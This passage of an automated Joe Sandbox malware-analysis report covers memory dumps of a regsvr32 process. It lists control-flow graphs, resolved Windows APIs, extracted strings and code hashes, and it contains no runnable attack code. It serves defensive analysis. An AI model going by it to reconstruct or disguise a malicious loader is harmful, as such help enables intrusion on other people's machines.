4064->4017 4076 7ffd3493f804-7ffd3493f810 4065->4076 4077 7ffd3493f7f2-7ffd3493f802 call 7ffd34947000 4065->4077 4079 7ffd3493f391-7ffd3493f39e 4067->4079 4080 7ffd3493f3aa 4067->4080 4068->4069 4071 7ffd3493f5a7-7ffd3493f5ab 4069->4071 4072 7ffd3493f595-7ffd3493f5a2 call 7ffd348efe90 4069->4072 4084 7ffd3493f5ad-7ffd3493f5b0 CloseHandle 4071->4084 4085 7ffd3493f5b5-7ffd3493f5cf 4071->4085 4072->4071 4073->3982 4081 7ffd3493f4fd-7ffd3493f511 call 7ffd348efe90 4073->4081 4074->4049 4074->4073 4075->4065 4086 7ffd3493f7ce-7ffd3493f7d0 4075->4086 4090 7ffd3493f814-7ffd3493f820 4076->4090 4077->4090 4088 7ffd3493f66d-7ffd3493f687 4078->4088 4089 7ffd3493f64c-7ffd3493f662 4078->4089 4082 7ffd3493f3ac-7ffd3493f3c5 call 7ffd3490c530 4079->4082 4080->4082 4081->3982 4100 7ffd3493f6a6-7ffd3493f6b5 4082->4100 4101 7ffd3493f3cb-7ffd3493f3d5 4082->4101 4084->4085 4086->4090 4088->4085 4091 7ffd3493f68d-7ffd3493f69f call 7ffd348efe90 4088->4091 4089->4072 4095 7ffd3493f668 4089->4095 4091->4085 4095->4071 4100->4043 4101->4029
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentPrng
                                                                              • String ID:
                                                                              • API String ID: 716580790-0
                                                                              • Opcode ID: 0df334ae3f1341972e445362f2916964484d83b33dbd9aa1e2784f31b7def40e
                                                                              • Instruction ID: bc6ec330fc3fb8291bb3f9e4169a6a44435c3c40e9b44282cc182def78a86829
                                                                              • Opcode Fuzzy Hash: 0df334ae3f1341972e445362f2916964484d83b33dbd9aa1e2784f31b7def40e
                                                                              • Instruction Fuzzy Hash: FF220422B04A828AEB648F25D8B03B92790FB46798F144239EF5E877DDDF3CD541A310
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: kE
                                                                              • API String ID: 0-1687065583
                                                                              • Opcode ID: 8f3f8bf7fa46a44ee1e171b3fad80ba7b3f33142f7fc0cabe1a7f593173d6017
                                                                              • Instruction ID: b18683c557b8d6ccb3502ebd30b90c2e5fb52936671dcabd5b8c5633083d5afd
                                                                              • Opcode Fuzzy Hash: 8f3f8bf7fa46a44ee1e171b3fad80ba7b3f33142f7fc0cabe1a7f593173d6017
                                                                              • Instruction Fuzzy Hash: 60F27271A1895D8FEB98EF18C8A16B8BBE1EF58304F4401B9D45DF72CADE24E841CB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 7403 7ffd348fa1b0-7ffd348fa1bd 7404 7ffd348fa216 7403->7404 7405 7ffd348fa1bf-7ffd348fa1cb 7403->7405 7407 7ffd348fa218-7ffd348fa224 7404->7407 7406 7ffd348fa1d8-7ffd348fa1fc BCryptGenRandom 7405->7406 7408 7ffd348fa1d0-7ffd348fa1d6 7406->7408 7409 7ffd348fa1fe-7ffd348fa20c SystemFunction036 7406->7409 7408->7404 7408->7406 7409->7408 7410 7ffd348fa20e-7ffd348fa214 7409->7410 7410->7407
                                                                              APIs
                                                                              • BCryptGenRandom.BCRYPT(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA1F2
                                                                              • SystemFunction036.ADVAPI32(?,?,?,00007FFD348F9CF5,?,?,?,00007FFD348E75E3), ref: 00007FFD348FA205
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CryptFunction036RandomSystem
                                                                              • String ID:
                                                                              • API String ID: 1232939966-0
                                                                              • Opcode ID: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction ID: 65d8aa66f8bd1c53f04c58e3a01a8d9f1d7b70b0aff3ba751c94dcb5592bb17f
                                                                              • Opcode Fuzzy Hash: c031059723b10d59420d2a20c74ec451050b05ffebddda9da0033cc7770c6797
                                                                              • Instruction Fuzzy Hash: 52F09053F0915905FE7516A63E945B580415F2ABF0D288335AE3AD7AD5AC2C6C863100
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: H
                                                                              • API String ID: 0-2852464175
                                                                              • Opcode ID: 3afb46e7ee860a2a045ed4e282ea2a77fc2dba6c33cc5c8de209ced5545ebd2b
                                                                              • Instruction ID: c4f0025c4ea9077982e89f909824ad76052b1f1e1dab73fc791e70c9faa5eb28
                                                                              • Opcode Fuzzy Hash: 3afb46e7ee860a2a045ed4e282ea2a77fc2dba6c33cc5c8de209ced5545ebd2b
                                                                              • Instruction Fuzzy Hash: 6812573290D79E0FE3569B2498651B4BFE1EF82220F0501FBD49DDB1E3DA286806D776
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: sK_^
                                                                              • API String ID: 0-2515636007
                                                                              • Opcode ID: 43a2a401d5b9a86f3f839bd9974b9f4a6561ff53ad369d37bc01bb4da774ce21
                                                                              • Instruction ID: c9405ee97f8f15a14919fc20f87434a104da80768ab9c79c8b5f2112f6e4d221
                                                                              • Opcode Fuzzy Hash: 43a2a401d5b9a86f3f839bd9974b9f4a6561ff53ad369d37bc01bb4da774ce21
                                                                              • Instruction Fuzzy Hash: 29F18E62A1CA6A4FE745BB2CE4E55F8BBD1EF54324B04017BD00CE71C7CE18A486C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04613ff6111592d946c4591884d27e5ce86a6aed31232b156e869f51da31a55b
                                                                              • Instruction ID: a839bc1a283cbc3a974edcdde9451853393c0ebe129d2d35d99f6eca934f6867
                                                                              • Opcode Fuzzy Hash: 04613ff6111592d946c4591884d27e5ce86a6aed31232b156e869f51da31a55b
                                                                              • Instruction Fuzzy Hash: 24622731A0C91D4FE768DA1CC896678B7D1EF99310F1402B9D46ED32DADE24AC43C7A5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2145176917.00007FFCF4490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCF4490000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffcf4490000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0135e244934d2e92c307bdb903ba578ea7ed458f639cd6d4ce0ccd5b6280472
                                                                              • Instruction ID: fc7a469490e68dc63a97f5b098287a4f171a2430439b4add5a06122f43ff1663
                                                                              • Opcode Fuzzy Hash: a0135e244934d2e92c307bdb903ba578ea7ed458f639cd6d4ce0ccd5b6280472
                                                                              • Instruction Fuzzy Hash: BC124130B1892D4FDB84FB18C4E5AB9B7E1FB98314B504179D41EE32DADE28E841C7A1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle$memcpymemset
                                                                              • String ID: :$called `Result::unwrap()` on an `Err` value
                                                                              • API String ID: 3399779480-2450422549
                                                                              • Opcode ID: 2652290765158f07b095b2e49c49a60cec60f8bf4307c97cfe14cf2b329653a4
                                                                              • Instruction ID: 996ba971ebd50a4943896cf99c184efdef6f08b63242ad6eb29740ee3b7d0798
                                                                              • Opcode Fuzzy Hash: 2652290765158f07b095b2e49c49a60cec60f8bf4307c97cfe14cf2b329653a4
                                                                              • Instruction Fuzzy Hash: 28234122A0DBC691FA758B14F4947EAB360FB96344F449229DBCC42699DF7CE2C4DB40

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2245 7ffd348e7f00-7ffd348e7f1d call 7ffd34992a4c 2248 7ffd348e83f4-7ffd348e8408 2245->2248 2249 7ffd348e7f23-7ffd348e7f38 call 7ffd349929fc 2245->2249 2249->2248 2252 7ffd348e7f3e-7ffd348e7f48 GetModuleHandleA 2249->2252 2252->2248 2253 7ffd348e7f4e-7ffd348e7f55 2252->2253 2253->2248 2254 7ffd348e7f5b-7ffd348e7ff7 call 7ffd348f65a0 call 7ffd348e8610 call 7ffd348e7180 call 7ffd34992bf4 call 7ffd348e7180 GetProcAddress 2253->2254 2265 7ffd348e7ff9-7ffd348e8002 call 7ffd348efe90 2254->2265 2266 7ffd348e8007-7ffd348e800f 2254->2266 2265->2266 2268 7ffd348e8011-7ffd348e801a call 7ffd348efe90 2266->2268 2269 7ffd348e801f-7ffd348e809a call 7ffd348e7180 GetModuleHandleA call 7ffd348e7180 GetProcAddress 2266->2269 2268->2269 2275 7ffd348e809c-7ffd348e80a5 call 7ffd348efe90 2269->2275 2276 7ffd348e80aa-7ffd348e80b2 2269->2276 2275->2276 2278 7ffd348e80b4-7ffd348e80bd call 7ffd348efe90 2276->2278 2279 7ffd348e80c2-7ffd348e813b call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2276->2279 2278->2279 2285 7ffd348e814b-7ffd348e8153 2279->2285 2286 7ffd348e813d-7ffd348e8146 call 7ffd348efe90 2279->2286 2288 7ffd348e8155-7ffd348e815e call 7ffd348efe90 2285->2288 2289 7ffd348e8163-7ffd348e81dc call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2285->2289 2286->2285 2288->2289 2295 7ffd348e81ec-7ffd348e81f4 2289->2295 2296 7ffd348e81de-7ffd348e81e7 call 7ffd348efe90 2289->2296 2298 7ffd348e81f6-7ffd348e81ff call 7ffd348efe90 2295->2298 2299 7ffd348e8204-7ffd348e827d call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2295->2299 2296->2295 2298->2299 2305 7ffd348e827f-7ffd348e8288 call 7ffd348efe90 2299->2305 2306 7ffd348e828d-7ffd348e8295 2299->2306 2305->2306 2307 7ffd348e8297-7ffd348e82a0 call 7ffd348efe90 2306->2307 2308 7ffd348e82a5-7ffd348e831e call 7ffd348e7180 LoadLibraryA call 7ffd348e7180 GetProcAddress 2306->2308 2307->2308 2315 7ffd348e8320-7ffd348e8329 call 7ffd348efe90 2308->2315 2316 7ffd348e832e-7ffd348e8336 2308->2316 2315->2316 2318 7ffd348e8338-7ffd348e8341 call 7ffd348efe90 2316->2318 2319 7ffd348e8346-7ffd348e8384 2316->2319 2318->2319 2321 7ffd348e83b8-7ffd348e83c0 2319->2321 2322 7ffd348e8386-7ffd348e8389 2319->2322 2321->2248 2323 7ffd348e83c2-7ffd348e83c6 2321->2323 2322->2321 2324 7ffd348e838b-7ffd348e838e 2322->2324 2323->2248 2326 7ffd348e83c8-7ffd348e83d8 call 7ffd348efe90 2323->2326 2324->2321 2325 7ffd348e8390-7ffd348e83a5 CreateEventW 2324->2325 2325->2321 2327 7ffd348e83a7-7ffd348e83b6 WaitForSingleObject 2325->2327 2326->2248 2327->2321 2329 7ffd348e83da-7ffd348e83ef call 7ffd34992c8c call 7ffd34992a7c call 7ffd348e5430 2327->2329 2329->2248
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$HandleModule$CreateEventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 229642238-0
                                                                              • Opcode ID: 6885328148c1d0160a3d00ae2f864a6d679455b6c5dbdd36056da30315b74ffd
                                                                              • Instruction ID: ae1e5aff873be6bef264347a409fe0d5f4ce057c2b1bc2d82ff5a1390bcf0a55
                                                                              • Opcode Fuzzy Hash: 6885328148c1d0160a3d00ae2f864a6d679455b6c5dbdd36056da30315b74ffd
                                                                              • Instruction Fuzzy Hash: 1EC19422B0864740FE589B15E4A07BB6361BF877C4F484539EF4C8B69ADF3EE184A750

                                                                              Control-flow Graph: function at 2fe5a20 (graph node/edge dump omitted)
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ArrayCreateSafe$DestroyInstance
                                                                              • String ID: '6}$'6}
                                                                              • API String ID: 3360715445-1339616389
                                                                              • Opcode ID: 74cb407b86e009e2de3434ab0c58eb3fafdd6186553028191188630ac4eed7ef
                                                                              • Instruction ID: ad0dc235883c3830452bcd1cc6b5075317c37f44f95674e0f86cb2c3bf341b73
                                                                              • Opcode Fuzzy Hash: 74cb407b86e009e2de3434ab0c58eb3fafdd6186553028191188630ac4eed7ef
                                                                              • Instruction Fuzzy Hash: F1F1B33170C6588FCF69EA1C98C876A77E1FB98799F94091AE64BC7250DF20D8858B42

                                                                              Control-flow Graph: function at 7ffd3493f930 (graph node/edge dump omitted)
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandleOverlappedResult
                                                                              • String ID:
                                                                              • API String ID: 3756958029-0
                                                                              • Opcode ID: 9ad01a1efdc722d8725f6564751104539f854fcf843f6cc093d9607c21da64dc
                                                                              • Instruction ID: 09629becd0e96d21367f7999c8281521745ef32a758ae7708f8b54a391080136
                                                                              • Opcode Fuzzy Hash: 9ad01a1efdc722d8725f6564751104539f854fcf843f6cc093d9607c21da64dc
                                                                              • Instruction Fuzzy Hash: 4C619162F08A4689FB508A6584B13BC2BB0AB17798F144439DF0DD7B9DDF2CE585A360

                                                                              Control-flow Graph: function at 2fe1dc7 (graph node/edge dump omitted)
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2136151078.0000000002F90000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_2f90000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: 5\~$5\~$@$d
                                                                              • API String ID: 1029625771-872558757
                                                                              • Opcode ID: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
                                                                              • Instruction ID: f1c96c25251ca690118433b41cb20702e240131f77276febbdd245316987f3cc
                                                                              • Opcode Fuzzy Hash: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
                                                                              • Instruction Fuzzy Hash: 61A16815B2C7454BDF2E451A44B123E33CAFB99684F74152EEBCF82A92D7609D47C283

                                                                              Control-flow Graph: function at 7ffd34939060 (graph node/edge dump omitted)
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
                                                                              • Instruction ID: a38cc0b7e886a8c085328dfd3a2f497690e8e3bb2f29b2d70d8a6c1808818c09
                                                                              • Opcode Fuzzy Hash: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
                                                                              • Instruction Fuzzy Hash: 96611592F0C65245FB65866184B43BA27E86B07BD8F044139DF4D97BCDCE3DE845AB20
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 43d2fbeffe80e2b634febcdea785d4c16874e7fe28f13b5a2a25b6f10d7b6f82
                                                                              • Instruction ID: 421ef34fdad95b030717c913eb34bc2b47156bca157b72f4556fa574d9108474
                                                                              • Opcode Fuzzy Hash: 43d2fbeffe80e2b634febcdea785d4c16874e7fe28f13b5a2a25b6f10d7b6f82
                                                                              • Instruction Fuzzy Hash: D0025932B0CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                              • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                              • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: 01fa707cee9f390a062fa6ed25a6b583addd28d0ecc5d7cd671abc7ad59aeda4
                                                                              • Instruction ID: a0ccf34dafec2ed17391d1e95c7926c5b81bc8b7aaa70af00f5b137368b2274d
                                                                              • Opcode Fuzzy Hash: 01fa707cee9f390a062fa6ed25a6b583addd28d0ecc5d7cd671abc7ad59aeda4
                                                                              • Instruction Fuzzy Hash: BF025932B0CAC690EA759B15F4907EBA360FB86B84F444126DB8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                               • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147310142.00007FFD34A38000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147352056.00007FFD34A39000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147394662.00007FFD34A3A000.00000008.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147437278.00007FFD34A3D000.00000002.00000001.01000000.00000009.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_14_2_7ffd348e0000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $/i:S$SYNC
                                                                              • API String ID: 0-2968757536
                                                                              • Opcode ID: d3bbd176f2e146ea7c1c3b66c09cd2a3d9582550e46b3f019df6469dd46d896b
                                                                              • Instruction ID: d2874a0f5f2db1fe4fc2746e025f6bfd9c6b2953e5db7e3e77d4bcc8fe2d9d91
                                                                              • Opcode Fuzzy Hash: d3bbd176f2e146ea7c1c3b66c09cd2a3d9582550e46b3f019df6469dd46d896b
                                                                              • Instruction Fuzzy Hash: 76026B3270CAC690EA759B15F4907EBA360FB86B84F444126DF8C87A89DF7DD185DB40
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000E.00000002.2146891828.00007FFD348E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFD348E0000, based on PE: true
                                                                               • Associated: 0000000E.00000002.2146849088.00007FFD348E0000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147057606.00007FFD34995000.00000004.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp
                                                                               • Associated: 0000000E.00000002.2147265617.00007FFD34A37000.00000004.00000001.01000000.00000009.sdmp
